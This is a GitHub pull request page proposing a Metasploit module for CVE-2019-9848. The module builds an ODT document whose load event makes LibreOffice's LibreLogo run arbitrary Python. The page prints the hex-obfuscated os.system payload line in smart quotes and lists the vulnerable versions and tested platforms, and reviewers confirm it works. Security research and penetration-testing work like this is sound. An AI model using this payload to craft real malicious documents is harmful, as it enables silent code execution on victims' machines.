Join GitHub today
GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.Sign up
Add LibreOffice LibreLogo exec exploit Module (CVE-2019-9848) #12147
It seems to also work on 6.2.5 (should be tested again) and doesn't require any user interaction after opening the odt file with a vulnerable LibreOffice (in comparison to the original PoC).
This module exploits CVE-2019-9848 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.
LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands.
By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning.
This module generates an ODT file with a dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.
The generated document file contains a one-liner python code that calls
getattr(__import__("os"),"system")("<%= @cmd %>")
but with smart quotes
<text:p text:style-name="P8">getattr(__import__(“\x6f\x73”),“\x73\x79\x73\x74\x65\x6d”)(“<%= @cmd %>”)</text:p>
To avoid any python error, the
LibreOffice version 6.2.5 and prior.
This module has been tested successfully with:
LibreOffice 6.2.4 on Windows 7
LibreOffice 6.2.4 on Debian 9.9
Is there a reason to use
I ask, because this is a file format exploit, and there's no guarantee the user will open the document on the correct platform. Comparatively, if you're already executing native Python code, you could use a Python payload, which should effectively be universal, and execute regardless of the target platform.
FWIW, I tested this on Linux Mint 19.
Initial exploitation failed, as the Libre Logo package was not installed by default.
However, upon installation, the exploit worked as described:
Hi @LoadLow, I just noticed that you're working off of your
This helps protect the process, ensures users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes, and allows contributors to make progress while a PR is still being reviewed.
I'll go ahead and close this PR, and I'll be looking out for the new PR. Apologies for not catching this sooner. Thank you!